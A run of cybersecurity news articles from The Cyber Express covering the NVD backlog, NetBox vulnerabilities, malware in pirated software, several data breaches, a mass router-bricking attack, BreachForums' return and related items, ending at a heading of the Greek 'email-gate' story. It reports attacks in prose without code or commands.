The U.S. National Institute of Standards and Technology (NIST) has taken a big step to address the growing backlog of unprocessed Common Vulnerabilities and Exposures (CVEs) in the National Vulnerability Database (NVD). The institute has hired an external contractor to contribute additional processing support in its operations. The contractor hasn't been named, but NIST said it expects that the move will allow it to return to normal processing rates within the next few months.

Clearing the National Vulnerability Database Backlog

NIST is responsible for managing entries in the NVD. After being overwhelmed with the volume of entries amid a growing backlog of CVEs that have accumulated since February, the institute has awarded an external party with a contract to aid in its processing efforts. "We are confident that this additional support will allow us to return to the processing rates we maintained prior to February 2024 within the next few months," the agency stated. To further alleviate the backlog, the NIST is also working closely with CISA, the Cybersecurity and Infrastructure Security Agency, to improve its overall operations and processes. "We anticipate that this backlog will be cleared by the end of the fiscal year," the NIST stated. In its status update, NIST referenced an earlier statement the agency made that it was exploring various means to address the increasing volume of vulnerabilities through the use of modernized technology and improvements to its processes. [caption id="attachment_73938" align="alignnone" width="2332"] Source: NIST NVD Status Updates[/caption] "Our goal is to build a program that is sustainable for the long term and to support the automation of vulnerability management, security measurement and compliance," the institute said. NIST reaffirmed its commitment to maintaining and modernizing the NVD, stating, "NIST is fully committed to preserving and updating this vital national resource, which is crucial for building trust in information technology and fostering innovation."

CISA's 'Vulnrichment' Initiative

In response to the growing NVD backlog at NIST, CISA had launched its own initiative called "Vulnrichment" to help enrich the public CVE records. CISA's Vulnrichment project is designed to complement the work of the originating CNA (Common Vulnerabilities and Exposures Numbering Authority) and reduce the burden on NIST's analysts. CISA said it would use an SSVC decision tree model to categorize vulnerabilities. The agency will consider factors like exploitation status, technical impact, impact on mission-essential functions, public well-being, and whether the exploitation is automatable. CISA welcomes feedback from the IT cybersecurity community on this effort. By providing enriched CVE data, CISA aims to improve the overall quality and usefulness of the NVD for cybersecurity professionals. "For those CVEs that do not already have these fields populated by the originating CNA, CISA will populate the associated ADP container with those values when there is enough supporting evidence to do so," the agency explained. As NIST and CISA work to address the current challenges, they have pledged to keep the community informed of their progress as well as on future modernization plans. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Carrier has issued a serious product security advisory confirming the existence of several vulnerabilities in its LenelS2 NetBox access control and event monitoring platform. These vulnerabilities expose the monitoring system to potential compromise, such as remote code execution. The reported vulnerabilities are significant, as NetBox is often used to guard entries at critical facilities such as government-controlled sites and major corporations.

Multiple Vulnerabilities in Carrier's LenelS2 NetBox

Three vulnerabilities were identified in Carrier's product security advisory for NetBox. The most critical (CVE-2024-2420) of these vulnerabilities could potentially enable an attacker to circumvent authentication requirements and obtain elevated permissions, presenting a serious risk to enterprises which deploy the tool. [caption id="attachment_73894" align="alignnone" width="1478"] Source: Carrier Product Security Advisory[/caption] Successful compromise could allow an attacker to install programs, view, edit, modify data, delete data from the platform or create new user accounts with full privileges. However, this depends on the access level of accounts that had been compromised in the event of an attack. The impact of a potential attack could be lower on systems configured with low level of user access. The vulnerabilities affect all LenelS2 NetBox versions prior to 5.6.2. The identified vulnerabilities are as follows:

• CVE-2024-2420 (CVSS v3.1 Base Score 9.8, Critical): A vulnerability involving a hard-coded password in the system that could permit an attacker to bypass authentication requirements.
• CVE-2024-2421 (CVSS v3.1 Base Score 9.1, Critical): An unauthenticated remote code execution vulnerability that could permit an attacker with elevated permissions to run malicious commands
• CVE-2024-2422 (CVSS v3.1 Base Score 8.8, High): An authenticated remote code execution vulnerability that could permit an attacker to execute malicious commands.

The Center of Internet Security stated that these vulnerabilities pose higher risks to large and medium government or business entities, while posing lower risks to small businesses and individual home owners. [caption id="attachment_73896" align="alignnone" width="1128"] Source: cisecurity.org[/caption]

Vulnerability Remediation

Carrier has attempted to address these vulnerabilities in its latest release of NetBox version 5.6.2. Carrier has advised customers to immediately upgrade to the latest release version by reaching out to their authorized NetBox installer. As mitigation, Carrier also advised customers to follow the recommended deployment guidelines, which are detailed in its NetBox hardening guide accessible through NetBox's built-in help menu. The Center of Internet Security has advised customers to take additional measures such as applying appropriate updates to NetBox systems, applying the principle of least privilege to user accounts, rigorous scanning of vulnerabilities and isolating critical systems, functions, or resources. The lack of basic security safeguards along with poor code practices such as the presence of hard-coded authentication tokens and improper input sanitization raises concerns about the usage of NetBox to guard physical access to important business and government areas or critical infrastructure. While there are no confirmed reports of the NetBox vulnerabilities being exploited in the wild, the severity of these vulnerabilities mark them as an important security consideration as countless organizations could be at risk of devastating attacks. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

South Korean researchers have observed the malicious use of pirated copies and cracked activators of legitimate productivity and office utility programs such as Hangul Word Processor and Microsoft Office to disguise malicious programs. The malware maintains persistence by scheduling regular upgrades on affected systems, leading to consistent installation of newer strains of the malware multiple times every week.

Malicious Pirated Copies of Microsoft Office and Other Programs

Researchers from AhnLab discovered that attackers have been creating and distributing malicious copies of popular utility software. These copies were distributed through common file-sharing platforms and torrent websites. The operation takes advantage of users looking to obtain free copies of software without paying the required license fee. When downloaded and executed, the programs usually appear as convincing cracked installers or activators for programs such as Microsoft Office or the Hangul word processor. While the initial downloader was developed in .NET, the attackers appear to have moved to more obfuscated attack techniques. The malware retrieves its instructions for the next stage of its attack from Telegram or Mastodon channels operated by the attackers. These channels contain encrypted Base64 strings that lead to Google Drive or GitHub URLs that host the malicious payloads. These malicious payloads are downloaded and decrypted through the use of the legitimate 7-zip archive utility that is commonly present on systems and operates with low footprint. Researchers discovered that the decrypted payloads contained PowerShell instructions to load and execute additional malware components on the victim's system. The malware strains loaded on the infected systems include:

• OrcusRAT: A remote access trojan with extensive capabilities like keylogging, webcam access, and remote screen control.
• XMRig Cryptominer: Configured to stop mining when resource-intensive apps are running to avoid detection. Also kills competing miners and security products.
• 3Proxy: Injects itself into legitimate processes to open a backdoor proxy server.
• PureCrypter: Fetches and runs additional malicious payloads from attacker-controlled servers.
• AntiAV: Disrupts security products by repeatedly modifying their configuration files.

The commands include an updater that contains instructions to maintain persistence over the system through the use of the native Windows Task Scheduler present on the Windows operating system. C&C server addresses shared by the researchers also indicate that they have been disguised as a minecraft rpg server.

Continuous Reinfection and Distribution

The researchers said systems may remain infected even after the initial infection has been removed, due to the malware's ability to update itself as well as download additional malware payloads. They stated that the attackers had distributed new malware on affected systems multiple times each week to bypass file detection. The researchers said the number of systems that had been compromised in these attacks continued to increase as the registered task scheduler entries loaded additional malicious components on affected systems despite the removal of previous underlying malware. The researchers advised South Korean users to download software and programs from their official sources rather than file-sharing sites. Users who suspect that their systems may already have been infected should remove associated task scheduler entries to block the download of additional malware components, and update their antivirus software to the latest available versions. The researchers have additionally shared indicators of compromise, categories that have been detected as flagged in the attack, MD5 hashes of files used in the attack, associated C&C server addresses, and suspicious behaviors that have been observed during the attack. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Toshiba America Business Solutions reached out to customers to inform them of a potential data security incident in which their personal information may have been compromised. Toshiba America Business Solutions is an American subsidiary of the Toshiba TEC Corporation. The company said that it was committed to protecting the confidentiality and security of personal data, and offered credit monitoring services to affected individuals.

Toshiba America Data Breach

After conducting a preliminary investigation, Toshiba reported that an attacker may have compromised its email environment. The attacker may have obtained unauthorized access to sensitive personally identifiable information such as names and Social Security numbers from the email compromise. The investigation confirmed that the breach could have impacted numerous individuals, leading Toshiba to contact affected individuals, as legally required. Toshiba America Business Solutions advised customers to remain cautious over the incident. The firm advised customers to regularly review their credit reports, financial account statements, and payment card statements for any unauthorized activity. Any suspicious activity could be reported to Toshiba or law enforcement agencies. Toshiba apologized to the affected individuals for any inconvenience stemming from the incident and said that additional measures had been implemented since then to enhance the security of its email environment and prevent similar occurrences in the future. To assist the affected individuals in safeguarding their personal information, Toshiba has arranged for a complimentary, two-year membership of identity monitoring services offered through Kroll. This membership offering includes triple bureau credit monitoring, fraud consultation, and identity theft restoration. The fraud consultation option allows affected individuals  to reach out to Kroll fraud specialists for advice and assistance relating to identity protection, legal rights, and detection of suspicious activity. The identity theft restoration option lets affected individuals work with a licensed Kroll investigator to resolve potential identity theft issues. Toshiba stated that these services would be provided for free to the affected individuals and would not negatively impact their credit scores. Affected individuals were encouraged to use the services as well as to contact Toshiba or Kroll for additional assistance.

Law Firm Announces Investigation

Strauss Borrelli PLLC, a data breach law firm, announced on its website that it would be investigating Toshiba American Business Solutions, Inc. with regard to the recent data breach that exposed sensitive personally identifiable information. While the full extent of the data breach is unknown, the Toshiba America Business Solutions division operates offices across the U.S. and Latin America. The law firm encouraged customers who received a breach notification letter from Toshiba American Business Solutions to contact Strauss Borrelli PLLC to discuss their rights and potential legal remedies in response to the incident. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

In one of the largest mass bricking events in history, at least 600,000 routers belonging to subscribers of the same ISP service were essentially destroyed last October. The incident has been dubbed "Pumpkin Eclipse," with researchers still unclear on how the routers became infected. The affected devices displayed a steady red light and were unresponsive to troubleshooting attempts, and had to be replaced. Now new research is shedding light on the attack, which involved unusually sophisticated and stealthy attack methods.

'Pumpkin Eclipse' Router Attack

The attack began on October 25, 2023, as the ISP's subscribers began reporting their ActionTec T3200 and Sagemcom routers had suddenly stopped working. Users described the devices as unresponsive, with a steady red light on the front panel. Many blamed the ISP for the mass "bricking" of the routers, alleging the company had pushed faulty firmware updates. However, according to new research by Black Lotus Labs, the incident was in fact the result of a deliberate, malicious act. The researchers reported that over a 72-hour period, a malware known as "Chalubo" had infected over 600,000 routers connected to a single autonomous system number (ASN) belonging to an unnamed ISP. While the researchers avoided naming the ISP affected in the attack, the description of the attack matches frustrations expressed months ago by subscribers of the Windstream ISP, such as the router affected and its resulting behavior. The Chalubo malware, a commodity remote access trojan (RAT) first identified in 2018, employed sophisticated tactics to cover its tracks. It removed all files from the infected devices' disks, ran entirely in memory, and assumed random process names already present on the routers. The researchers believe the malware downloaded and ran code that permanently overwrote the router's default device firmware, rendering them permanently inoperable. The researchers state that while the motives behind the attack are unknown, its implications are troubling.

Researchers Unsure Over Initial Attack Vector but Theorize Possibilities

Although the researchers identified the malware's multi-chain attack process and its spread across the ISP's network, they have been unable to determine the initial infection vector employed by the threat actor. They theorize that it could have possibly resulted from the exploit of an inherent vulnerability, exploit of weak credentials, or compromise of the routers' administrative panels. The researchers said the attack is highly concerning, as it represents a new precedent for malware capable of mass-bricking consumer networking devices. The researchers could only recall one prior similar event - the 2022 discovery of the AcidRain malware, which knocked out over 10,000 satellite internet modems in Ukraine and Europe during the start of the Russian invasion. The researchers said the impact of "Pumpkin Eclipse" attack was particularly severe, as the affected ISP's service area covers many rural and underserved communities. Residents may have lost access to emergency services, farmers could have been cut off from remote crop monitoring, and healthcare providers may have been unable to access patient records or provide telehealth services. "At this time, we do not assess this to be the work of a nation-state or state-sponsored entity," the Lumen researchers wrote. In fact, we have not observed any overlap with known destructive activity clusters; particularly those prone to destructive events such as Volt Typhoon, or SeaShell Blizzard. Nonetheless, they speculated that usage of a commodity malware family may have been a deliberate move to obscure the perpetrator's potential identity. Recovery from such a supply chain disruption is always more challenging in isolated or vulnerable regions, the researchers added. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Pharmaceutical giant Johnson & Johnson recently announced a data breach that may stem from a larger data breach affecting Lash Group, a division of Cencora. In February, Cencora reported a data breach incident to the U.S. Securities and Exchange Commission (SEC) after learning that data had been exfiltrated from its information systems, some of which contained personal information. The breach may have compromised some sensitive information of patients registered with Johnson & Johnson Patient Assistance Foundation, Inc.

Johnson & Johnson Data Breach Notice

On May 29, Johnson & Johnson filed a notice of data breach with the Attorney General of Texas, indicating that an unauthorized party accessed confidential patient information. The breach affected approximately 175,000 Texans, but the total number of victims nationwide could be much higher. The breach affects two Johnson & Johnson entities: Johnson & Johnson Patient Assistance Foundation, Inc., and Johnson & Johnson Services, Inc. The following data was compromised in the attack: Name of individual, Address, Medical Information, and Date of Birth. Data breach notification letters have been sent to all the affected individuals, while limited information is available on the Texas Attorney General's data breach reports page. The incident is potentially linked to a much larger breach involving Cencora, which has affected over a dozen major pharmaceutical companies so far.

Link to Cencora Data Breach

The Johnson & Johnson data breach bears several similarities to other large third-party pharmaceutical company data breaches affected by the Cencora/Lash Group data breach, which was first discovered on February 21. Cencora’s Lash Group division aids pharmaceutical companies in running patient support programs that try to ensure that costly medication is available to disadvantaged patients, regardless of their ability to pay for them. At least 15 clients of Cencora/Lash Group have notified state authorities of data breach incidents, with databreaches.net listing the following victims:

• AbbVie: 54,344 Texans affected
• Acadia Pharmaceuticals: 753 Texans affected
• Bayer: 8,822 Texans affected
• Bristol Myers Squibb and/or the Bristol Myers Squibb Patient Assistance Foundation: 256,237 Texans and 11,503 New Hampshire residents affected
• Dendreon: 2,923 Texans affected
• Endo: no numbers provided
• Genentech: 5,805 Texans affected
• GlaxoSmithKline Group of Companies and/or the GlaxoSmithKline Patient Access Programs Foundation: no numbers provided
• Incyte Corporation: 2,592 Texans affected
• Marathon Pharmaceuticals, LLC/PTC Therapeutics, Inc.: 466 Texans and 27 New Hampshire residents affected
• Novartis Pharmaceuticals: 12,134 Texans affected
• Pharming Healthcare, Inc.: 314 Texans and 9 New Hampshire residents affected
• Regeneron Pharmaceuticals: 91,514 Texans affected
• Sumitomo Pharma America, Inc.: 24,102 Texans affected
• Tolmar: 1 New Hampshire resident

Data breach notices have also been filed with California officials too. While the full extent of the damage has yet to be determined, it has affected over 540,000 patients so far. Cencora stated in its notification to the Securities and Exchange Commission that it had not yet been able to determine if the incident had a material impact on its operations. In in a notice on its website, the Leash Group indicated that personal information as well as personal health information had been potentially affected, including first name, last name, date of birth, health diagnosis, and/or medications and prescriptions. The Leash Group said in a statement that no personal data appears to have been exposed because of the incident:

“There is no evidence that any of this information has been or will be publicly disclosed, or that any information was or will be misused for fraudulent purposes as a result of this incident, but we are communicating this so that affected individuals can take the steps outlined below to protect yourself.”

The Leash Group is offering free credit monitoring and remediation services to affected individuals, and additional guidance on dealing with suspected breaches of personal information. No perpetrator has been identified or named as being responsible for the attack, and the potential impact of the breach is still being assessed. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Following the seizure of the BreachForums domain and the arrest of Baphomet, its new owner ShinyHunters seems to have fully regained control over the site after a recent announcement that the forum will be open for account registration. While the domain itself appeared to have been seized back from law enforcement, the site remained dysfunctional for a while as staff redirected visitors to a new Telegram channel. The site slowly resumed operations while initially disabling account registration. However, the arrests and law enforcement activity connected to the operation of the domain, as well as its quick return to operations, have led cybercriminals to fear possible compromise of the forum infrastructure by law enforcement.

BreachForums Seizure and Return

BreachForums, widely recognized as the successor to RaidForums, has faced several downtimes, seizures and disruptions in its eventful history. The original owner, Conor Brian Fitzpatrick AKA "Pompompurin," was arrested last year on cybercrime and device fraud charges. BreachForums administrator "Baphomet" announced that he would step in as successor and opened a new domain to resume forum activity. However, Baphomet himself feared site compromise by law enforcement and temporarily shut down the forums, expressing that "nothing is safe anymore." [caption id="attachment_72568" align="alignnone" width="1536"] Source: Cyble[/caption] However, Baphomet later announced that he would be working on a new domain and resuming forum operations. The forum soon returned with regular facilitation of data leak sharing and discussion. A year later, Baphomet himself faced arrest after a joint operation from law enforcement, which also seized the BreachForums domain and official Telegram channel. The administrator ShinyHunters emerged as the successor, confirming Baphomet's arrest. However, the domain seizure was short-lived, and was soon redirecting users to a new Telegram channel. An allegedly leaked conversation from an FBI operative to BreachForum's previous domain name registrar and hosting provider NiceNic also appeared to indicate that ShinyHunters had regained control over domain ownership despite its court-ordered seizure. [caption id="attachment_72579" align="alignnone" width="326"] Source: Telegram[/caption] After a period of dysfunction, BreachForums has now resumed operations, with threat actors already claiming new victims on its forum postings.

Emerging Alternatives and Criminal Suspicion Over BreachForums

In the wake of the recent seizure, several other individuals expressed their doubts over BreachForums and its possible usage as a "honeypot" by law enforcement to entrap cybercriminals and disrupt operations. The owner of Secretforums and former owner of Blackforums expressed his belief over Telegram that Baphomet was possibly an informant to law enforcement, citing the latter's interest in maintaining the infrastructure of Blackforums. Prominent threat actor USDoD also cast doubt over the succession of BreachForums to the administrator Shiny Hunters, citing his low stats on the previous domain. These concerns were followed by the self-promotion of SecretForum's and USDoD's announced project "Breach Nation" as possible alternatives. More recently, the CyberNi***rs threat actor group also announced its intention to start a new site to coordinate its operations. Despite these activities and the surrounding suspicion, new owner Shiny Hunters seems eager to return to earlier activities and operations, as judged by their claim of responsibility for an attack impacting Live Nation Entertainment Inc., the parent company of Ticketmaster. The results of these events, their effect on the cybercriminal ecosystem, as well as the viability of emerging forums as alternatives to the relaunched BreachForums led by ShinyHunters, remain unclear. But given how vocal the participants are, the picture will almost certainly get clearer with time. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Fans of Bring Me The Horizon have been fervently searching for secrets and clues hidden within an 'M8 Artificial Reality game' subtly teased in a recent music video by the band. Near the video's conclusion, a character emerges, briefly greets viewers, and then abruptly instructs them to search for a specific code. Although the discovery of the hidden game thrilled many, excitement was momentarily dampened when the game's website was swapped out for a warning urging visitors not to hack into the system.

Bring Me The Horizon Hidden M8 Artificial Reality Game

Bring Me the Horizon, a British rock band formed in Sheffield in 2004, is celebrated for embedding hidden meanings, easter eggs, and clues in their music. With the release of their latest album, 'POST HUMAN: NeX GEn,' the band has notably deepened this practice, incorporating even more intricate layers of secrets into their songs. In one of the music videos from this album, a character named 'M8' appears and begins to greet the viewer but is abruptly stopped by a 'fatal-error'. M8 then directs the viewer to find the 'serial number' located on the side of its head. A curious listener appeared to have further analyzed the video segment in the video and discovered a hidden spectrogram containing a QR Code, sharing an image file on the rock band's subreddit. Fans further discovered that the QR code led to the URL domain of a hidden clandestine hacking-themed website, containing the M8 Artificial Reality Game. [caption id="attachment_72429" align="alignnone" width="233"] Source: /r/BringMeTheHorizon subreddit[/caption] The M8 Artificial Reality domain then instructed users to enter a hidden serial code, which fans discovered through the use of several other clues. The site contained unreleased tracks, password-protected files, and various mysteries for fans to uncover. [caption id="attachment_72432" align="alignnone" width="2800"] Source: multidimensionalnavigator8.help[/caption] As news of the hidden website spread, fans swiftly set up a dedicated Discord server and collaborated using a Google Doc to unearth all the site’s secrets. However, their excitement was brief. Hackers soon tried to extract further secrets from the website using unconventional methods, leading developers to temporarily shut down the site and issue a warning to fans.

Warnings Over Hacking Attempts

After the hacking attempts, cautionary messages from M8, the album's virtual guide, expressed dismay at the intrusion, stressing on how such actions undermined the spirit of collective exploration. These messages were delivered through both the website which was temporarily replaced with the warning for 2 hours as well as through email. [caption id="attachment_72445" align="alignnone" width="2800"] Source: archive.org[/caption] [caption id="attachment_72448" align="alignnone" width="276"] Source: BringMeTheHorizon ARG Discord[/caption] The developers appeared to indirectly condemn these attempts through the creative  use of the M8 character, without specifying the nature of the intrusion or identifying the perpetrators. Some fans however, upon receiving the email after their explorations, found the message warnings unexpected for what they believed were legitimate interactions. The community believed that these selective few hackers ruined the experience for others, with it's discord server noting the downtime in it's FAQ. 0 Bring Me The Horizon's foray into alternate reality gaming showcases the creative potential of digital media in music and album promotion. As fans continue to work together to unravel the remaining mysteries and solve the puzzles within the ARG, it remains to be seen what other surprises await them on the hidden website. The hacking attempts and the subsequent warnings serves as a reminder that while ARGs can be an engaging and immersive experience, it is essential to respect the developers' intentions and play fair to ensure everyone can enjoy the journey together. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Strauss Borrelli PLLC, a leading law firm known for handling data breach litigation, has launched an investigation into the recent WD & Associates data breach. WDA, based in Rhode Island, is an employee benefits brokerage firm specializing in healthcare consulting. The company assists clients in making well-informed decisions about financial planning and employee benefits. The incident may have exposed sensitive personally identifiable information and protected health information for an undetermined number of patients and other affected individuals.

WD & Associates Data Breach

WD & Associates provide a wide range of services including Employee Benefits, Safe Money Management, HR Consulting, Retirement Planning, IRA Rollovers, Actuarial Consulting, Risk Management, Business Consulting, Organizational Development. However, information from these services may be potentially compromised after a recent data breach. The security incident occurred between February 1 and February 9, 2023, when an unauthorized actor accessed sensitive information stored on WDA systems. WD stated that it had taken immediate action to secure its network and launched an investigation to determine the nature and scope of the breach. WDA began notifying potentially impacted individuals of the incident on May 24, 2024. The potentially exposed information includes:

• Name
• Social Security number
• Date of birth
• Driver’s license number
• Passport number
• Financial account information
• Medical information
• Health insurance information

WD is offering 24 months of complimentary credit monitoring services through Experian to enrolled individuals. The company also stated that it would implement additional cybersecurity tools and review existing policies and procedures to prevent similar incidents from occurring in the future. WD also stated that it had notified details about the investigation to relevant federal law enforcement and would notify relevant regulators, as legally required.

Strauss Borrelli PLLC Investigation Into Data Breach

The Strauss Borrelli PPLC Law firm announced on it's site that it would be interested in discussing further rights and potential legal remedies with the individuals who received the recent data breach notification letter from WD & Associates, Inc. Individuals can contact the law firm through their number 872.263.1100 or e-mail address sam@straussborrelli.com. Individuals should also remain vigilant against identity theft and fraud by regularly reviewing account statements, explanation of benefits, and monitoring free credit reports for suspicious activity. Additionally, U.S. consumers are legally entitled to one free credit report annually from each of the three major credit reporting bureaus(Equifax, Experian, and TransUnion). To request a free credit report, visit www.annualcreditreport.com or call 1-877-322-8228. Consumers also have the option to place a fraud alert or implement credit freeze on their credit file at no cost. Suspicious activity should be reported promptly to relevant parties, including insurance companies, healthcare providers, and financial institutions. WD & Associates affirmed its commitment to protecting the privacy and security of its clients' information and that the company would continue to provide updates and further information as soon as they become available. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Check Point researchers have observed a surge in threat actor groups targeting remote-access VPN environments as an entry point for gaining access to enterprise networks. In response to these threats, Check Point has been monitoring unauthorized access attempts on Check Point VPNs and has released a preventative solution to address the issue. While the researchers suggested that the issue is broader than Check Point VPNs, the fix applies solely to Check Point environments.

Identification of Unauthorized Access Attempts to Check Point VPN

On May 24, Check Point identified a small number of login attempts using old VPN local accounts that relied on an unrecommended password-only authentication method. The company assembled special teams of Incident Response, Research, Technical Services, and Products professionals to thoroughly investigate these attempts and any other potentially related incidents. Within 24 hours, the teams identified several potential customers who were subject to similar attempts and notified them accordingly. The teams consider password-only authentication methods insecure and more susceptible to the compromise of network infrastructure, recommending against solely relying on these methods when logging into network infrastructure. Several points were advised by the teams as preventative measures, such as:

• Reviewing and disabling unused local accounts.
• Implementing an additional layer of authentication, such as certificates, to password-only accounts.
• Deploying additional solutions on Security Gateways to automatically block unauthorized access.
• Contacting the Check Point technical support team or a local representative for additional guidance and assistance.

In case of suspected unauthorized access attempts, Check Point researchers recommend that organizations analyze all remote access connections of local accounts with password-only authentication, monitor connection logs from the past 3 months, and verify the familiarity of user details, time, source IP address, client name, OS name, and application based on configured users and business needs. Check Point has also released a hotfix to prevent users with password-only authentication from connecting to Security Gateways. After implementation, password-only authentication methods for local accounts will be prevented from logging into the Check Point Remote Access VPN. If any connections or users are not validated, invoking the incident response playbook or contacting Check Point Support or a local Check Point representative is advised. The company stated that it witnessed the compromise of several VPN solutions, including those of various cybersecurity vendors.

Implementing Check Point VPN Hotfix

Check Point released a script to identify potential risks of compromise in its VPN environment. Enterprises can download the VPNcheck_v2.zip archive file and follow the steps mentioned on the solution page. If the script identifies local accounts with password-only authentication, users can proceed with the installation of the Security Gateway Hotfix as an option. The hotfix is available via the Check Point Upgrade Service Engine (CPUSE) or through manual download. The Hotfix implements a new command, blockSFAInternalUsers, to the Security Gateway, allowing admins to block or grant access to internal users with password-only authentication. The default value is set to block internal users from connecting with password-only authentication. After installing the hotfix, users who attempt to connect using the weak password-only authentication method will receive a security log indicating the blocked attempt as failed. As remote operations and online threats rise, organizations must prioritize the implementation of tougher VPN authentication methods while monitoring for unauthorized attempts to access these environments. Failure to do so can lead to compromised network infrastructure or assets, data breaches, and significant financial and reputational damage. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The notorious ransomware gang RansomHub has claimed responsibility for a recent cyberattack on Christie's auction house, disrupting its website just days before its marquee spring sales and leaking data to back up its claims. The group posted a message on its dark web leak site claiming to have gained access to compromised information about the world's wealthiest art collectors. Christie's officials downplayed the seriousness of the breach, however, and said that no financial or transactional data was compromised in the attack.

RansomHub Claims Cyberattack on Christie's Auction House

The attack, which occurred two weeks ago, had brought down Christie's official website, forcing the auction firm to switch to methods such as an alternative domain to reach potential buyers and sellers ahead of its highly anticipated spring sales after the company announced it would proceed with the sales despite setbacks. The sales were scheduled to occur at multiple locations such as New York and Geneva, and estimated to fetch 850 million dollars from buyers. The RansomHub ransomware gang has now claimed responsibility for the attack on its leak site, stating that it had compromised about 2GB of data from the the auction giant during the initial network compromise. The details were said to include BirthPlace, MRZFull, DocumentNumber, BirthDate, ExpiryDate, FirstName, LastName, IssueDate, IssuingAuthority, DocumentCategory, DocumentType and NationalityName. [caption id="attachment_71548" align="alignnone" width="751"] Source: X.com (@AlvieriD)[/caption] The threat actor group said they had attempted to come to a "reasonable solution," but that Christie's had ceased communications midway and failed to pay the demanded ransom. The threat group shared an alleged sample of the stolen data. [caption id="attachment_71550" align="alignnone" width="725"] Source: X.com (@AlvieriD)[/caption] The hackers warned that Christie's would face heavy fines under the EU's General Data Protection Regulation (GDPR) and face reputation damage among its clients. The General Data Protection Regulation (GDPR) mandates that EU companies disclose security incidents that compromise client data, with non-compliance potentially leading to fines up to $22 million. Cybersecurity experts describe RansomHub as a powerful ransomware group with possible ties to ALPHV, a network of Russian-speaking extortionists.

Christie's Auction House Downplays Data Leak

Christie’s acknowledged the cyberattack on Christie's Auction House and unauthorized access, with spokesman Edward Lewine stating that the auction house is investigating the incident. The preliminary findings indicate that the hackers obtained a limited amount of personal client data but stopped short of compromising financial or transactional records. Christie CEO Guillaume Cerutti also stated in a recent interview with CNBC that there was no evidence that any transaction or financial data has been impacted or leaked in the incident. The company appeared to downplay the impact of the incident earlier, describing it as a "technology security incident." However, employees privately reported a sense of panic, with limited information shared about the breach by top leaders. Several prominent buyers and sellers also indicated to the New York Times that they were in the dark about the impact, and were not alerted to the hack until a reporter had reached out to them. Lewine stated that the auction house was now in the process of notifying privacy regulators and government agencies, and would also be notifying affected clients shortly. Despite the attack, the spring sales concluded with $528 million in revenue, suggesting the incident did not significantly deter bidding activities. Following the sales, Christie's regained control of its website. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Greek Personal Data Protection Authority (PDPA) has imposed significant fines on the Greek Ministry of Interior and New Democracy MEP Anna-Michelle Asimakopoulou for their roles in violating data protection regulations in the 'email-gate' scandal. The fines come after an investigation into the "email-gate" scandal, in which Asimakopoulou was accused of sending unsolicited emails to Greeks living abroad ahead of the European Parliament elections in June.

Ministry of Interior Violations and Consequences

The authority found that a file of 25,000 voters registered for the June 2023 elections had been leaked between June 8 and 23, 2023. The list, which included voter emails, was sent to New Democracy's then Secretary for Diaspora Affairs, Nikos Theodoropoulos, by an unknown individual. Theodoropoulos forwarded the file to MEP Asimakopoulou, who used it to send mass campaign emails in violation of data protection laws and basic principles of legality. [caption id="attachment_71501" align="alignnone" width="1000"] Source: Shutterstock (MEP Anna-Michelle Asimakopoulou)[/caption] On receiving the unsolicited emails to their private accounts, several Greek diaspora voters living abroad expressed their surprise on social media and accused the New Democracy MEP of violating the European Union’s General Data Protection Regulation (GDPR). The expats questioned how the addresses were obtained by the MEP for use in the email campaigns. Asimakopoulou earlier attempted to refute allegations of violating these data protection laws but was found to provide contradictory explanations regarding the source from which these addresses were obtained for usage in the mass email campaign. As a result, the Ministry of Interior faces a 400,000-euro fine, while Asimakopoulou faces a 40,000-euro fine. The authority also postponed its verdict on Theodoropoulos and the New Democracy party  to examine new claims related to the investigation. The PDPA stated in its investigation that the use of the emails, “was in violation of the basic principle of legality, objectivity and transparency of processing, as it was in violation of a series of provisions of the electoral legislation and furthermore could not reasonably be expected.” The ministry said it will "thoroughly study" the authority's decision to consider further legal actions. The "email-gate" scandal has led to significant consequences, including the resignation of the general secretary of the Interior Ministry, Michalis Stavrianoudakis, and the dismissal of Theodoropoulos by New Democracy. Asimakopoulou has announced she will not run in the European Parliament elections. Asimakopoulou is also facing 75 lawsuits by citizens and over 200 lawsuits from the Interior Ministry, over the scandal.

Reaction of Opposition Parties to the Investigation Results

